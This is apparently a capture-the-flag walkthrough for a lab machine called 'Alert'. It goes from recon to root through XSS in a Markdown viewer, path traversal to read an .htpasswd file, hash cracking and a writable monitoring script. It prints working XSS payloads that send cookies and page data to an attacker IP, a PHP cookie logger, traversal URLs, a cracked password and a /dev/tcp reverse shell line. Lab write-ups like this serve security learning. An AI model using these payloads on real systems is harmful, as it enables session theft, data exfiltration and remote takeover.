Linux - Easy - Alert

Created At: Updated At:
Keywords: xss pathtraversal linux

Recon

1a0d7f0ca1c5f5212e41af48fcce37a1.png

$nmap -p- -A 10.129.128.120
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
12227/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2f5304e5081f7ebc15b2df219b65dfb1.png

$whatweb alert.htb
http://alert.htb [302 Found] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], RedirectLocation[index.php?page=alert], Title[Alert - Markdown Viewer]
http://alert.htb/index.php?page=alert [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], Title[Alert - Markdown Viewer]
gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://domain.htb  --append-domain -t 150
Found: statistics.alert.htb Status: 401 [Size: 467]

statistics.alert.htb

c44909bffddb62c6aabf1c859c5b2961.png

Markdown visualizer

After uploading a file, we can see it on /visualizer.php.

f8d3061b1bddba1c0c4bfc1306e0dc37.png

Using the share button, we can get name of our file on the server.

bf2a5601fd0feaf2ef8b7065e1f9f8af.png

Testing further, adding <script>alert(1)</script> to our file, gets us alert 1.

85b29cc7a434fd9fe4228cff2b2e4a40.png

I was fighting with XSS to execute my file for a while, but no go. I’ve menaged to download files from my server, but not execute them. I worked on stealing cookies later, but it does

Test markdown

<script src="http://10.10.16.6/script.js"></script>
new Image().src='http://10.10.16.6/index.php?c='+document.cookie
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

2686b3042b14720d5db1e6f8e781fa45.png

I tried like a moron to get user data, and got mine.

# Test markdown

<script src="http://10.10.16.6/script.js"></script>

<script

const data = {
    cookies: document.cookie,
    userAgent: navigator.userAgent,
    url: window.location.href,
    referrer: document.referrer,
    platform: navigator.platform
};

fetch('http://10.10.16.6/', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(data)
});></script>

But this got me an idea, that I could use the support page and embed in the message link to the site with XSS as image. So I’ve created another markdown file.

# Test markdown

<script>
fetch("http://alert.htb/")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.16.6/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("xss error:", error));
</script>

And then click share to get link. Then upload the message to support and we finally get data.

c47b9b83efdc45fa66c8d095de57683a.png

77073749328a85ad5645a0ead54b6736.png

Then we can see the contents using cybercheff.

Progres. Then, I’ve tried path traversal on messages file, with url http://alert.htb/messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf

e1cd78370e65e984aadd07523c810c22.png

Then we can look for htpasswd under http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd.

13e08a7ed8ac6946200cc8b4f1a10a6a.png

3290b4b542790a64ccceed1ecc4ba625.png

We got the user and hash. albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ. This hash is not on crackstation, so we have to run hashcat hashcat -m 1600 test.hash /usr/share/wordlists/rockyou.txt and we get manchesterunited.

55ca6cbb47bfb3e2670ae0dddc465dc9.png

We can then log in onto the site http://statistics.alert.htb.

37579e924e700decffcb487243f0a6cc.png

The same works for ssh! We are in.

Priv Esc

Running simple enum we can see that there is something on port 8080.

3719347cfb79438b3af5f17d52d1a2f4.png

Running wget and cat shows us that it is a Website Monitor, so that is out target probably. Let’s pass it back to us then with ssh -L 8080:localhost:8080 albert@alert.htb.

7893c2c8503603ffc96c7027b94f4ff9.png

If we then go to /opt we can see our website-monitor. It has only one folder which belongs to menagement. Fortunetly we are in this group, uid=1000(albert) gid=1000(albert) groups=1000(albert),1001(management).

d0478cbc7b79f39315f967c60707a39e.png

We can then modify it with exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'"); so we get get reverse shell.

<?php
define('PATH', '/opt/website-monitor');
exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'");
?>

96931810c19ccf1956b339925690d0ef.png

We are done.